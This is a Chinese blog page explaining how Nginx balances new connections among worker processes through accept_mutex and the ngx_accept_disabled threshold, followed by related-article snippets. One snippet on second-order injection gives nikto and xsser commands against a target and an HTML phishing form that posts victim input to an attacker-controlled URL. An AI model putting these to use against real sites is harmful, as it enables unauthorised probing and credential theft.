Nginx学习之九-负载均衡(客户端请求与Nginx进程间负载均衡)

最新推荐文章于 2025-02-14 22:11:08 发布
最新推荐文章于 2025-02-14 22:11:08 发布
阅读量7.3k 收藏 2
点赞数 3
分类专栏: Nginx Nginx模块开发与原理剖析 文章标签: Linux Nginx 负载均衡 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiajun07061225/article/details/9272179
版权
本文探讨了Nginx中的负载均衡机制,特别是在多核CPU环境下,如何通过accept_mutex锁和ngx_accept_disabled变量来确保各个worker子进程间的负载均衡,避免部分进程过度负载导致的服务性能下降。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文介绍的负载均衡是针对的客户端请求在多个Nginx进程之间的均衡。注意与客户端请求在多个后端服务器之间的均衡相区别。

负载均衡问题的产生


在nginx中,建立连接的时候,会设计负载均衡问题。在多个子进程争抢处理一个新连接事件时,一定只有一个worker子进程最终会成功建立连接,随后它会一直处理这个连接直到连接关闭。那么,就有可能出现这样的情况:有的子进程建立并处理了大部分连接,而有的子进程只处理了少量连接。这对多核CPU架构下的应用是很不利的。因为子进程之间应该是平等的,每个子进程应该尽量独占一个CPU核心。子进程间负载不均衡,必定会影响整个服务的性能。

如何解决负载均衡问题


与惊群问题的解决方法一样,只有打开了accept_mutex锁,才能实现子进程间的负载均衡。同时post事件机制也是解决负载均衡问题的关键。可以参考前一篇文章 http://blog.youkuaiyun.com/xiajun07061225/article/details/9260535
在ngx_event_accept方法建立新连接的过程中,初始化了一个全局变量ngx_accept_disabled。它就是负载均衡机制实现的关键阈值。其定义(/src/event/ngx_event.c):
ngx_int_t             ngx_accept_disabled;

初始化(sr/event/ngx_event_accept.c)是在函数ngx_event_accept中:
ngx_accept_disabled = ngx_cycle->connection_n / 8  - ngx_cycle->free_connection_n;

这样,在nginx启动的时候其实是个负值: -7/8 * ngx_cycle->connection_n。

依据这个值进行负载均衡的核心代码是在函数ngx_process_events_and_timers中(src/event/ngx.event.c)
         //负载均衡处理
        if (ngx_accept_disabled > 0) {
            ngx_accept_disabled--;
        } else {
            //调用 ngx_trylock_accept_mutex方法,尝试获取accept锁
            if (ngx_trylock_accept_mutex(cycle) == NGX_ERROR) {
                return;
            }

解释一下:
当ngx_accept_disabled 为负数时,不会触发负载均衡操作,正常获取accept锁,试图处理新连接。
ngx_accept_disabled  为正数时,会触发负载均衡操作。nginx此时不再处理新连接事件,取而代之的仅仅是把变量 ngx_accept_disabled  减一,这表示既然经过一轮事件处理,那么负载肯定有所减小,所以要相应调整这个值。

即,当当前使用的连接超过总连接数的7/8的时候才会被触发,值越大,表示负载越重。每次调用process_events的时候只会将  ngx_accept_disabled    减一,直到 ngx_accept_disabled  降到0,即使用的连接数降到总连接数的7/8。这样就减少了该worker进程处理新连接的机会,这样其他较空闲的worker进程就有机会去处理更多的新连接,以达到整个web服务器的均衡效果。

Nginx默认将accept_mutex配置项设置为accept_mutex on。

参考资料

《深入理解Nginx》


Nginx基础. 防止惊群进程之间的负载均衡
博客
09-25 1370
作为服务器进程, 每个worker进程都需要处理大量网络事件. 而网络事件的处理来源于对监听端口新连接的建立. 当有多个worker进程同时监听同一(或多个)端口时, 建立连接就没那么简单了. Nginx出于充分发挥多核CPU性能的考虑, 则使用了多个worker子进程的设计. 这样多个子进程在accept建立连接时候就会有争抢, 产生"惊群"问题. 有的系统可能在内核就解决了这个问题,
云计算实训17——nginx反向代理、负载均衡nginx软件平滑升级
m0_73907608的博客
07-30 1001
nginx反向代理;nginx 虚拟主机配置;nginx 访客 IP ⿊名单;nginx 七层负载均衡nginx 四层负载均衡nginx软件平滑升级;
django 使用nginx实现负载均衡
rongDang的博客
07-14 1251
环境配置
Nginx负载均衡
2401_83342251的博客
02-14 1326
正向代理是在客户端和目标服务器之间充当中间人的代理服务器。当客户端请求访问目标服务器时,请求先发送到正向代理服务器,然后由代理服务器转发请求给目标服务器,并将目标服务器的响应返回给客户端。正向代理隐藏了客户端的真实IP地址,使得目标服务器无法直接识别和追踪客户端。反向代理是在服务器端和客户端之间充当中间人的代理服务器。当客户端发送请求访问反向代理服务器时,代理服务器会根据一定的规则将请求转发给后端的多个服务器中的一,然后将后端服务器的响应返回给客户端
nginx 对多进程进行负载均衡(通过线程池来判断)
weixin_33738555的博客
11-12 461
在线程池中计算当前负载,做一个决定,是否运行自身进程继续抢任务 我们重点看ngx_trylock_accept_mutex这个函数,该函数中 ngx_int_t ngx_trylock_accept_mutex(ngx_cycle_t *cycle) { //在这里添加代码,如果线程池忙,不允许继续accept,则直接return if (n...
nginx+redis负载均衡、session共享
03-30
作为反向代理,Nginx接收来自客户端请求并将其转发到后端服务器,这样可以隐藏内部网络结构,提高安全性,同时通过负载均衡策略将请求分发到不同服务器,减轻单服务器的压力。 负载均衡Nginx的核心功能之一...
使用nginx负载均衡的模块解读
01-09
ngx_http_upstream_module是Nginx实现负载均衡的关键模块,它允许我们定义一组后端服务器,并根据预设的策略将客户端请求分发到这些服务器上,以实现高可用性和负载分布。Nginx负载均衡功能包括反向代理、动态...
HAProxy+Nginx实现负载均衡
08-11
### HAProxyNginx实现负载均衡的关键知识点 #### 一、HAProxy简介特性 HAProxy是一款开源的、高效且可靠的负载均衡器,专为处理大规模Web流量设计。其核心功能包括: - **高可用性**:HAProxy能够确保在主...
nginx实战负载均衡
weixin_70751365的博客
07-30 904
早期的网站流量和业务功能都比较简单,单服务器足以满足基本的需求, 但是随着互联网的发展,业务流量越来越大并且业务逻辑也跟着越来越复 杂,单服务器的性能及单点故障问题就凸显出来了,因此需要多服务器进行性能的水平扩展及避免单点故障出现。负载均衡是将负载分摊到不同的服务单元,既保证服务的可用性,又保证响 应足够快,给用户很好的体验,快速增长的访问量和数据流量催生了各式各样的负载均衡的产品,很多专业的的负载均衡硬件提供了很好的功能,但价格不菲,这使得负载均衡软件大受欢迎,nginx就是其中一个,在。
负载均衡 一直跑一个服务器_终于把服务器负载均衡客户端负载均衡讲清楚了...
weixin_39737492的博客
11-28 471
服务端负载均衡我们常说的负载均衡都是指服务端负载均衡,服务端负载均衡又分为硬件负载均衡,软件负载均衡。硬件负载均衡主要是在各服务器节点 前加上负载均衡的设备,如F5软件负载均衡主要指的是在服务器上安装具有负载 均衡功能的软件来完成负载均衡,常见的是Nginx。无论硬件负载均衡还是软件负载均衡,工作原理大概相同:用户服务的请求首先打到Nginx上,然后Nginx根据负载均衡算法进行选择一个服务调用,...
nginx负载均衡_nginx负载均衡配置实例
weixin_39763902的博客
12-05 166
什么是负载均衡负载均衡主要通过专门的硬件设备或者通过软件算法实现。通过硬件设备实现的负载均衡效果好、效率高、性能稳定,但是成本比较高。通过软件实现的负载均衡主要依赖于均衡算法的选择和程序的健壮性。均衡算法也是多种多样的,常见的有两大类:即静态负载均衡算法和动态负载均衡算法。静态算法实现比较简单,在一般网络环境下也能达到比较好的效果,主要有一般轮询算法、基于比率的加权轮询算法以及基于优先...
服务器负载均衡客户端负载均衡的区别?
bozi
03-21 8027
服务器负载均衡:例如Nginx,通过Nginx进行负载均衡,先发送请求,然后通过负载均衡算法,在多个服务器之间选择一个进行访问;即在服务器端再进行负载均衡算法分配。 负载均衡是我们处理高并发、缓解网络压力和进行服务端扩容的重要手段之一,但是一般情况下我们所说的负载均衡通常都是指服务端负载均衡,服务端负载均衡又分为两种,一种是硬件负载均衡,还有一种是软件负载均衡。 硬件负载均衡主要通过在服务器...
nginx反向代理配置两个不同服务器
热门推荐
sollor525的专栏
08-02 2万+
1. 什么是反向代理: 反向代理服务器架设在服务器端,通过缓冲经常被请求的页面来缓解服务器的工作量,将客户机请求转发给内部网络上的目标服务器;并将从服务器上得到的结果返回给Internet上请求连接客户端,此时代理服务器目标主机一起对外表现为一个服务器。 2. 反向代理的主要作用: 目前web网站使用反向代理,除了可以防止外网对内网服务器的恶性攻击、缓存以减少服务器的压力和访问安全控...
nginx服务器配置django负载均衡
YxinMiracle's Studio.
10-24 197
这就很简单了,我们通过上一章节的就知道两个服务器怎么做负载均衡了,那么这一章节就很容易理解了,django配置上去后,数据库也有主从配置,所以两个服务器对用户体验来说可以说是没有问题的,但是又可以减轻我们服务器的压力,这实在是太好玩了,所以我们来看看这到底怎么做吧! 当我们两边都配置好django服务后,我们看看服务器1的配置: 当我们用户访问到80端口的时候,直接转发到django服务进行分发,这样就可以实现了!!!! ...
nginx 请求转发_Nginx负载均衡详解
weixin_39880615的博客
11-28 523
轮询nginx将所有请求均匀的分给集群中的每服务器。upstream test {server 127.0.0.1:7001; # 等同于server 127.0.0.1:7001 weight=1;server 150.109.118.85:7001; # 等同于server 150.109.118.85:7001 weight=1;}server {listen 8081;server_na...
Nginx负载均衡个别服务器宕机后的切换及相关平衡配置
Dengrz的Blog
07-22 7583
Nginx 目前很火,前很火、很火、火,做为高性能的反向代理服务器目前技术也是比较成熟的,对于缓解服务器压力,能够支持高达 50,000 个并发连接数的响应,而且有非诚优秀的移植性,Nginx是有自己的函数库的,除了zlib、PCRE和OpenSSL之外标准模块只使用系统C库函数。下面来简单贴出配置文件+说明:   1. 在http节点下,添加upstream节点。 ups
nginx负载均衡高可用
Dominic0112的博客
02-23 269
1.1 什么是负载均衡高可用nginx作为负载均衡器,所有请求都到了nginx,可见nginx处于非常重点的位置,如果nginx服务器宕机后端web服务将无法提供服务,影响严重。为了屏蔽负载均衡服务器的宕机,需要建立一个备份机。主服务器和备份机上都运行高可用(High Availability)监控程序,通过传送诸如“I am alive”这样的信息来监控对方的运行状况。当备份机不能在一...
kali二次注入
最新发布
04-01
### Kali Linux二次注入相关的技术操作 #### 什么是二次注入? 二次注入是一种高级攻击形式,通常发生在应用程序未能正确处理用户输入的情况下。在这种情况下,恶意数据会被存储在数据库或其他持久化介质中,并在稍后的某个时间点被重新解析或执行[^1]。 #### 实现二次注入的技术细节 为了利用二次注入漏洞,渗透测试人员需要遵循以下原则和技术: 1. **识别潜在的二次注入场景** - 应用程序可能将用户的输入存储到数据库中,并在未来将其作为动态内容呈现给其他用户。 - 数据库中的字段可能会被再次解析为SQL语句的一部分,或者通过模板引擎渲染成HTML页面[^3]。 2. **构造有效的载荷** - 使用工具如 `sqlmap` 或手动编写 SQL 注入载荷来验证是否存在未经过滤的数据存储行为。 - 对于 XSS 类型的二次注入,可以尝试嵌套 JavaScript 脚本标签 `<script>` 并观察其是否被执行。 3. **自动化工具的应用** - 利用 Kali Linux 提供的安全评估工具集,例如 Nikto 和 Xsser 来辅助发现和确认这些复杂的注入路径。 ```bash nikto -host http://example.com -output /path/to/output.txt ``` 上述命令用于扫描目标网站并记录结果至指定文件中以便后续分析[^2]。 同样地,在寻找跨站脚本(XSS)可能性方面,可以通过如下方式调用 Xsser 工具: ```bash xsser -u "http://targetsite/page" -g "param=value" --cookie="sessionid=abcde" ``` 4. **实际案例演示——基于 SET 的社会工程学攻击扩展** 当使用 Social Engineering Toolkit (SET) 构建钓鱼网页时,默认生成的 HTML 表单允许自定义提交地址以及参数名称。如果开发者忽略了对 POST 请求数据的有效校验,则可能导致进一步的危害扩散[^4]。 ```html <form action="{{ attacker_controlled_url }}" method="post"> <!-- 用户填写的信息 --> </form> ``` 上述代码片段展示了如何修改默认配置从而引导受害者访问受控资源,进而触发额外逻辑链路下的安全风险暴露。 --- #### 注意事项 尽管掌握此类技能对于合法授权范围内的红队行动至关重要,但在未经授权前提下实施任何类型的入侵活动均属违法行为,请务必严格遵守法律法规!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

没有昵称阿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值